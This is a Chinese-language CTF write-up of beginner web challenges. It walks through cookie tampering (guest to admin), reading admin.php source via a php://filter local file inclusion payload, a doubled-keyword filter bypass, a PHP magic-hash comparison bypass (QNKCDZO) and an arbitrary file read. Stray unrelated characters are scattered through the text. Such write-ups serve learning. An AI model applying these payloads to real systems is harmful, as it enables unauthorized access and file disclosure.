i_love_cookie
id=guest
,改成id=admin
即可巨坊。
proxy
看到一個(gè)鏈接:
/index.php?url=http://naver.com
猜測(cè)是文件包含够坐,可以讀到admin.php
:
/index.php?url=php://filter/read=convert.base64-encode/resource=admin.php
<?php
$flag = 'flag{basic_SSRF_XDDDDDDD}';
if($_SERVER['REMOTE_ADDR'] === '127.0.0.1' || $_SERVER['REMOTE_ADDR'] === 'localhost' || $_SERVER['REMOTE_ADDR'] === '::1'){
echo $flag;
}
else{
echo 'hmm? you are not local ip';
}
這題原意是ssrf
吧。
easy_Web
看到一個(gè)id
巩检,嘗試輸入:id=admin
看到admin
被過(guò)濾了。
雙寫:
adadminmin
示启。只剩下
n
兢哭,猜測(cè)admi
也被過(guò)濾了。構(gòu)造:
adadmiadminmin
夫嗓。magic
有個(gè)source.phps
:
<?php
$flag = "^^";
$user_hash = $_GET['GOGO'];
if(sha1("10932435112") == md5($user_hash)){
echo "<h1>".$flag."</h1>";
}
else{
echo "no... -_-;";
}
?>
看下sha1("10932435112")
的結(jié)果:
所以只要找個(gè)
md5
值也為0exxx
的值就可以了迟螺。構(gòu)造:
?GOGO=QNKCDZO
readme
看到file=1.jpg
:
有個(gè)任意文件讀取:
題目沒(méi)給
flag
舍咖,我自己放個(gè)在根目錄下:總結(jié)
入門題目矩父,無(wú)聊玩玩。